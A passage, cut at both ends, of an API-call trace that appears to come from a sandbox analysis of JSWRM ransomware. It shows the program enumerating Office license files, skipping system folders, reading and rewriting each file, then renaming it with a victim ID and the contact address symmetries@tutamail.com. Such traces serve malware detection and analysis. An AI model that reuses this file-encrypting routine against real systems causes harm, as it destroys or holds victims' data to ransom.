Flags=0x0, Size=0xa0) returned 0x23da70 [0109.394] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProPlusR_Trial2-ul-oob.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\proplusr_trial2-ul-oob.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0109.395] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=11600) returned 1 [0109.395] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0109.395] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2d50) returned 0x24c1d0 [0109.395] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x2d50, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x2d50, lpOverlapped=0x0) returned 1 [0109.397] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0109.397] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x2d50, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x2d50, lpOverlapped=0x0) returned 1 [0109.397] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0109.397] CloseHandle (hObject=0x45c) returned 1 [0109.397] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d530 [0109.397] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0109.397] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0109.398] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0109.398] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0109.398] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0109.398] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0109.398] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a1f8 [0109.398] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a1f8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0109.398] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a1f8 | out: hHeap=0x1e0000) returned 1 [0109.398] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2368b8 [0109.398] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23e110 [0109.398] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2368b8 | out: hHeap=0x1e0000) returned 1 [0109.398] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0109.398] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProPlusR_Trial2-ul-oob.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\proplusr_trial2-ul-oob.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProPlusR_Trial2-ul-oob.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\proplusr_trial2-ul-oob.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0109.399] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23e110 | out: hHeap=0x1e0000) returned 1 [0109.399] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d530 | out: hHeap=0x1e0000) returned 1 [0109.399] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23da70 | out: hHeap=0x1e0000) returned 1 [0109.399] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240ef8 | out: hHeap=0x1e0000) returned 1 [0109.399] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fc0 | out: hHeap=0x1e0000) returned 1 [0109.399] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xea6d493a, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xea6d493a, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xea7dfa48, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x284c, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="ProPlusVL_KMS_Client-ppd.xrm-ms", cAlternateFileName="PR3EDD~1.XRM")) returned 1 [0109.399] lstrcmpiW (lpString1="ProPlusVL_KMS_Client-ppd.xrm-ms", lpString2=".") returned 1 [0109.399] lstrcmpiW (lpString1="ProPlusVL_KMS_Client-ppd.xrm-ms", lpString2="..") returned 1 [0109.399] lstrcmpiW (lpString1="ProPlusVL_KMS_Client-ppd.xrm-ms", lpString2="...") returned 1 [0109.399] lstrcmpiW (lpString1="ProPlusVL_KMS_Client-ppd.xrm-ms", lpString2="windows") returned -1 [0109.399] lstrcmpiW (lpString1="ProPlusVL_KMS_Client-ppd.xrm-ms", lpString2="recovery") returned -1 [0109.399] lstrcmpiW (lpString1="ProPlusVL_KMS_Client-ppd.xrm-ms", lpString2="perflogs") returned 1 [0109.400] lstrcmpiW (lpString1="ProPlusVL_KMS_Client-ppd.xrm-ms", lpString2="documents and settings") returned 1 [0109.400] lstrcmpiW (lpString1="ProPlusVL_KMS_Client-ppd.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0109.400] lstrcmpiW (lpString1="ProPlusVL_KMS_Client-ppd.xrm-ms", lpString2="system volume information") returned -1 [0109.400] lstrcmpiW (lpString1="ProPlusVL_KMS_Client-ppd.xrm-ms", lpString2="msocache") returned 1 [0109.400] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d920 [0109.400] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProPlusVL_KMS_Client-ppd.xrm-ms", cchWideChar=31, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 31 [0109.400] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f48 [0109.400] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProPlusVL_KMS_Client-ppd.xrm-ms", cchWideChar=31, lpMultiByteStr=0x240f48, cbMultiByte=31, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ProPlusVL_KMS_Client-ppd.xrm-ms", lpUsedDefaultChar=0x0) returned 31 [0109.400] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d920 | out: hHeap=0x1e0000) returned 1 [0109.400] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dde8 [0109.400] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProPlusVL_KMS_Client-ppd.xrm-ms", cchWideChar=31, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 31 [0109.400] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241290 [0109.400] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProPlusVL_KMS_Client-ppd.xrm-ms", cchWideChar=31, lpMultiByteStr=0x241290, cbMultiByte=31, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ProPlusVL_KMS_Client-ppd.xrm-ms", lpUsedDefaultChar=0x0) returned 31 [0109.400] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dde8 | out: hHeap=0x1e0000) returned 1 [0109.400] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2365d8 [0109.400] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d920 | out: hHeap=0x1e0000) returned 1 [0109.400] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0109.400] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0109.400] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2362f8 [0109.400] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProPlusVL_KMS_Client-ppd.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\proplusvl_kms_client-ppd.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0109.401] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=10316) returned 1 [0109.401] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0109.401] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2840) returned 0x24c1d0 [0109.401] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x2840, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x2840, lpOverlapped=0x0) returned 1 [0109.446] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0109.446] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x2840, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x2840, lpOverlapped=0x0) returned 1 [0109.446] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0109.446] CloseHandle (hObject=0x45c) returned 1 [0109.446] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236240 [0109.446] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0109.446] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0109.447] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0109.447] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0109.447] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0109.447] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0109.447] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a1f8 [0109.447] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a1f8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0109.447] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a1f8 | out: hHeap=0x1e0000) returned 1 [0109.447] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236a28 [0109.447] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23dee0 [0109.447] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236a28 | out: hHeap=0x1e0000) returned 1 [0109.447] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0109.447] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProPlusVL_KMS_Client-ppd.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\proplusvl_kms_client-ppd.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProPlusVL_KMS_Client-ppd.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\proplusvl_kms_client-ppd.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0109.448] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23dee0 | out: hHeap=0x1e0000) returned 1 [0109.448] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236240 | out: hHeap=0x1e0000) returned 1 [0109.448] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2362f8 | out: hHeap=0x1e0000) returned 1 [0109.448] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241290 | out: hHeap=0x1e0000) returned 1 [0109.448] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f48 | out: hHeap=0x1e0000) returned 1 [0109.448] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xea805c87, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xea805c87, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xea936f19, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x2d63, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="ProPlusVL_KMS_Client-ul-oob.xrm-ms", cAlternateFileName="PRDE91~1.XRM")) returned 1 [0109.448] lstrcmpiW (lpString1="ProPlusVL_KMS_Client-ul-oob.xrm-ms", lpString2=".") returned 1 [0109.449] lstrcmpiW (lpString1="ProPlusVL_KMS_Client-ul-oob.xrm-ms", lpString2="..") returned 1 [0109.449] lstrcmpiW (lpString1="ProPlusVL_KMS_Client-ul-oob.xrm-ms", lpString2="...") returned 1 [0109.449] lstrcmpiW (lpString1="ProPlusVL_KMS_Client-ul-oob.xrm-ms", lpString2="windows") returned -1 [0109.449] lstrcmpiW (lpString1="ProPlusVL_KMS_Client-ul-oob.xrm-ms", lpString2="recovery") returned -1 [0109.449] lstrcmpiW (lpString1="ProPlusVL_KMS_Client-ul-oob.xrm-ms", lpString2="perflogs") returned 1 [0109.449] lstrcmpiW (lpString1="ProPlusVL_KMS_Client-ul-oob.xrm-ms", lpString2="documents and settings") returned 1 [0109.449] lstrcmpiW (lpString1="ProPlusVL_KMS_Client-ul-oob.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0109.449] lstrcmpiW (lpString1="ProPlusVL_KMS_Client-ul-oob.xrm-ms", lpString2="system volume information") returned -1 [0109.449] lstrcmpiW (lpString1="ProPlusVL_KMS_Client-ul-oob.xrm-ms", lpString2="msocache") returned 1 [0109.449] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c118 [0109.449] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProPlusVL_KMS_Client-ul-oob.xrm-ms", cchWideChar=34, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 34 [0109.449] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0109.449] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProPlusVL_KMS_Client-ul-oob.xrm-ms", cchWideChar=34, lpMultiByteStr=0x22cdc8, cbMultiByte=34, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ProPlusVL_KMS_Client-ul-oob.xrm-ms", lpUsedDefaultChar=0x0) returned 34 [0109.449] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c118 | out: hHeap=0x1e0000) returned 1 [0109.449] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22be00 [0109.449] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProPlusVL_KMS_Client-ul-oob.xrm-ms", cchWideChar=34, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 34 [0109.449] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0109.449] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProPlusVL_KMS_Client-ul-oob.xrm-ms", cchWideChar=34, lpMultiByteStr=0x22ce70, cbMultiByte=34, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ProPlusVL_KMS_Client-ul-oob.xrm-ms", lpUsedDefaultChar=0x0) returned 34 [0109.449] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22be00 | out: hHeap=0x1e0000) returned 1 [0109.449] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236188 [0109.449] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2365d8 | out: hHeap=0x1e0000) returned 1 [0109.449] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0109.449] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0109.449] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236520 [0109.449] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProPlusVL_KMS_Client-ul-oob.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\proplusvl_kms_client-ul-oob.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0109.450] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=11619) returned 1 [0109.450] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0109.450] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2d60) returned 0x24c1d0 [0109.450] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x2d60, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x2d60, lpOverlapped=0x0) returned 1 [0109.452] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0109.452] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x2d60, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x2d60, lpOverlapped=0x0) returned 1 [0109.452] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0109.452] CloseHandle (hObject=0x45c) returned 1 [0109.453] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2368b8 [0109.453] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0109.453] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0109.453] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0109.453] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0109.453] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0109.453] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0109.453] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a2d0 [0109.453] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a2d0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0109.453] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a2d0 | out: hHeap=0x1e0000) returned 1 [0109.453] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24b768 [0109.453] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11e) returned 0x23f4d0 [0109.453] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24b768 | out: hHeap=0x1e0000) returned 1 [0109.453] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0109.453] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProPlusVL_KMS_Client-ul-oob.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\proplusvl_kms_client-ul-oob.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProPlusVL_KMS_Client-ul-oob.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\proplusvl_kms_client-ul-oob.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0109.457] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23f4d0 | out: hHeap=0x1e0000) returned 1 [0109.457] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2368b8 | out: hHeap=0x1e0000) returned 1 [0109.457] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236520 | out: hHeap=0x1e0000) returned 1 [0109.458] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0109.458] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0109.458] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xea63c020, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xea63c020, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xea720e7a, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x258b, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="ProPlusVL_KMS_Client-ul.xrm-ms", cAlternateFileName="PR9734~1.XRM")) returned 1 [0109.458] lstrcmpiW (lpString1="ProPlusVL_KMS_Client-ul.xrm-ms", lpString2=".") returned 1 [0109.458] lstrcmpiW (lpString1="ProPlusVL_KMS_Client-ul.xrm-ms", lpString2="..") returned 1 [0109.458] lstrcmpiW (lpString1="ProPlusVL_KMS_Client-ul.xrm-ms", lpString2="...") returned 1 [0109.458] lstrcmpiW (lpString1="ProPlusVL_KMS_Client-ul.xrm-ms", lpString2="windows") returned -1 [0109.458] lstrcmpiW (lpString1="ProPlusVL_KMS_Client-ul.xrm-ms", lpString2="recovery") returned -1 [0109.458] lstrcmpiW (lpString1="ProPlusVL_KMS_Client-ul.xrm-ms", lpString2="perflogs") returned 1 [0109.458] lstrcmpiW (lpString1="ProPlusVL_KMS_Client-ul.xrm-ms", lpString2="documents and settings") returned 1 [0109.458] lstrcmpiW (lpString1="ProPlusVL_KMS_Client-ul.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0109.458] lstrcmpiW (lpString1="ProPlusVL_KMS_Client-ul.xrm-ms", lpString2="system volume information") returned -1 [0109.458] lstrcmpiW (lpString1="ProPlusVL_KMS_Client-ul.xrm-ms", lpString2="msocache") returned 1 [0109.458] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d578 [0109.458] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProPlusVL_KMS_Client-ul.xrm-ms", cchWideChar=30, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 30 [0109.458] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241128 [0109.458] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProPlusVL_KMS_Client-ul.xrm-ms", cchWideChar=30, lpMultiByteStr=0x241128, cbMultiByte=30, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ProPlusVL_KMS_Client-ul.xrm-ms", lpUsedDefaultChar=0x0) returned 30 [0109.458] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d578 | out: hHeap=0x1e0000) returned 1 [0109.458] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d920 [0109.458] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProPlusVL_KMS_Client-ul.xrm-ms", cchWideChar=30, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 30 [0109.458] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412b8 [0109.458] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProPlusVL_KMS_Client-ul.xrm-ms", cchWideChar=30, lpMultiByteStr=0x2412b8, cbMultiByte=30, 